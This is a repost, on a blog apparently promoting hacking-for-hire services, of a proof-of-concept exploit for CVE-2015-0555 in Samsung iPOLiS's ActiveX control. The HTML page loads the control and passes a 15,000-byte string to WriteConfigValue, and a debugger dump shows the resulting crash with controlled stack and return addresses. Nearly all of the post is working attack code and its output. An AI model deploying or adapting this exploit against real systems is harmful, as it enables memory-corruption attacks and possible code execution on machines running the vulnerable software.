Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863104265

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->

<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";

for (i=0; i<= 15000; i++)
{
	arg1 += "A";
}

target.WriteConfigValue(arg1 ,arg2);

</script>
</html>

<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434	MOV AL,[ESI+EDX]

Seh Chain:
--------------------------------------------------
1 	647C7D7D 	mfc100.dll
2 	647D0937 	mfc100.dll
3 	64E242CA 	VBSCRIPT.dll
4 	77B3E0ED 	ntdll.dll


Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.149434           41414141
41414141                      414141
414141                        3DA4C4
3DA4C4                        mfc100.647790C1
mfc100.647790C1               56746C75


Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C


Block Disassembly:
--------------------------------------------------
149423	XOR EDI,EDI
149425	XOR ESI,ESI
149427	MOV [EBP-8C],ECX
14942D	TEST ECX,ECX
14942F	JLE SHORT 00149496
149431	MOV EDX,[EBP+8]
149434	MOV AL,[ESI+EDX]	  <--- CRASH
149437	CMP AL,2F
149439	JNZ SHORT 00149489
14943B	MOV ECX,EBX
14943D	TEST ESI,ESI
14943F	JNZ SHORT 0014944D
149441	PUSH 159F28
149446	CALL 0014F7C0
14944B	JMP SHORT 00149476


ArgDump:
--------------------------------------------------
EBP+8	00414141
EBP+12	003DA4C4 -> Asc: defaultV
EBP+16	647790C1 -> EBE84589
EBP+20	FFFFFFFE
EBP+24	646CBE5C -> CCCCCCC3
EBP+28	0000001C


Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00  [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]

-->